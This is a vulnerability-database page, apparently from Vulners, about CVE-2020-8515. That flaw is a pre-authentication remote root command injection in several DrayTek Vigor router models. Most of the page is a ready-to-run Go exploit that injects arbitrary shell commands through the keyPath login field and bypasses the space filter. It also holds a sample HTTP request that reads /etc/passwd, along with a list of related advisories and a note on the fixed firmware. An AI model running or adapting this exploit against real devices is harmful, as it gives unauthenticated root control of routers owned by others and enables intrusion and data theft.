Vulners
Lucene search
Multiple DrayTek Products - Pre-authentication Remote Root Code Execution
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | DrayTek Products - Pre-authentication Remote Root Code Execution Exploit | 30 Mar 202000:00 | – | zdt |
 | Exploit for OS Command Injection in Draytek Vigor2960_Firmware | 1 Sep 202122:47 | – | githubexploit |
| Exploit for OS Command Injection in Draytek Vigor2960_Firmware | 30 Mar 202003:31 | – | githubexploit |
 | Potential for China Cyber Response to Heightened U.S.–China Tensions | 20 Oct 202012:00 | – | ics |
| People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices | 10 Jun 202212:00 | – | ics |
 | CVE-2020-8515 | 1 Feb 202000:00 | – | attackerkb |
 | CVE-2020-8515 | 27 Mar 202023:08 | – | circl |
 | Multiple DrayTek Vigor Routers Web Management Page Vulnerability | 3 Nov 202100:00 | – | cisa_kev |
 | MS-ISAC Releases Advisory on DrayTek Devices | 1 Apr 202000:00 | – | cisa |
 | DrayTek Vigor Series Arbitrary Command Execution Vulnerability | 4 Feb 202000:00 | – | cnvd |
10
package main
/*
CVE-2020-8515: DrayTek pre-auth remote root RCE
Mon Mar 30 2020 - 0xsha.io
Affected:
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,
and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,
and 1.4.4_Beta
You should upgrade as soon as possible to 1.5.1 firmware or later
This issue has been fixed in Vigor3900/2960/300B v1.5.1.
read more :
https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html
https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
https://thehackernews.com/2020/03/draytek-network-hacking.html
https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
exploiting using keyPath
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: 1.2.3.4
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
*/
import (
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"strings"
)
func usage() {
fmt.Println("CVE-2020-8515 exploit by @0xsha ")
fmt.Println("Usage : " + os.Args[0] + " URL " + "command" )
fmt.Println("E.G : " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\"" )
}
func main() {
if len(os.Args) < 3 {
usage()
os.Exit(-1)
}
targetUrl := os.Args[1]
//cmd := "cat /etc/passwd"
cmd := os.Args[2]
// payload preparation
vulnerableFile := "/cgi-bin/mainfunction.cgi"
// specially crafted CMD
// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
payload :=`'
/bin/sh -c 'CMD'
'`
payload = strings.ReplaceAll(payload,"CMD", cmd)
bypass := strings.ReplaceAll(payload," ", "${IFS}")
//PostForm call url encoder internally
resp, err := http.PostForm(targetUrl+vulnerableFile ,
url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"} })
if err != nil{
fmt.Println("error connecting host")
os.Exit(-1)
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil{
fmt.Println("error reading data")
os.Exit(-1)
}
fmt.Println(string(body))
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Mar 2020 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8
CVSS 210
EPSS0.94318
SSVC